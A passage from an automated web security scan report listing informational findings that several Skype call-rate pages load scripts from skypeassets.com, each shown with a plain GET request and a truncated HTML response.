   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.713. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guam

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guam HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.714. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guatemala  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guatemala

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guatemala HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.715. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guinea

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guinea HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.716. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.717. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guyana  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guyana

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guyana HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.718. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-haiti  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-haiti

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-haiti HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.719. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-honduras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-honduras

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-honduras HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.720. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-hungary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-hungary

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-hungary HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.721. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iceland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-iceland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-iceland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.722. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-india  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-india

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-india HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.723. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-indonesia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-indonesia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-indonesia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.724. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inmarsat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-inmarsat

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-inmarsat HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.725. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-inum

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-inum HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.726. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iran  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-iran

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-iran HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.727. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iraq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-iraq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-iraq HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.728. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ireland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
